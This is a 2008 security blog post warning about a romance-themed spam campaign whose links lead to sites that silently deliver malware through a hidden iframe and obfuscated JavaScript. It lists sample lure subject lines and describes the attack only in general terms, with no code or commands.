« That E-Card Isn't From Hallmark | Main | July 4th. Storm. Duh. [Updated] »

July 02, 2008

Back in May, my blog entry Love Hurts told the quick story of a Storm-like email message that tried to lure victims to a site that automatically downloaded an executable Windows program. A month later, a new wave of such messages started flowing, but the destination at the end of the email links is far more insidious.

As before, the range of message Subject: lines, while all in a romantic vein, are all over the place. Here is a sampling of ones I've seen:

• Can't stay away from you
• Lucky to have you
• My heart belongs to you
• I want to be with you
• I Wanna Be With You
• Crazy in love with you
• Lost In Love
• For you...Sweetheart!
• You make my world beautiful
• My heart beats just for you
• I'll Still Love You More
• Love me tender, love me true

Ugh. I'm getting that bad taste one gets from having eaten one-too-many of those chalky candy hearts with ooey-gooey phrases on them. "I Wuv You."

Message bodies are a continuation of the one-sentence theme employed by not only a lot of recent malware lures, but recent medz and knockoff brand-name goods spammers who use the same address lists. I'd repeat some of the message bodies here, but reciting too many lines in the spirit of "Missing you with every breath" will make me vomit.

What these messages want you to do is visit the URLs at the end of the sickly sweet lines. Some email clients turn anything they recognize as a URL into a clickable link, unfortunately making it easier to go in search of your untrue love. The URLs are to a bunch of plain-language .com domain names, such as makinglovedirect.com (now suspended the last time I checked).

Visiting any of those sites with an unpatched Internet Explorer could land you in a world of hurt. If you ever see the following page, it could be too late for you:

No, I really wasn't the lucky 10,000th visitor. Everyone is the lucky 10,000th visitor. Just as I've written that the assertion "this is not spam" means that it's spam, the assertion that "this is not a joke" means that it's a joke.

Although two downloads require clicking on either the image or "click here" link, there is an unseen iframe element that automatically targets numerous vulnerabilities. The malware distributor uses obfuscated JavaScript to make the initial delivery. Because I've been a JavaScript nut since before Day One, I spent some time deconstructing the delivery mechanism of this iframe. Rather than bore non-scripting blog readers with the gory details, I've created a separate document that shows my findings. You can download the 374KB PDF file here (Creative Commons licensed).

Almost all of us want to be wanted and loved. Malware distributors exploit that desire by making us believe we have secret admirers and might even get lucky with the right connection. With this malware campaign, you won't get laid, but you might well be screwed.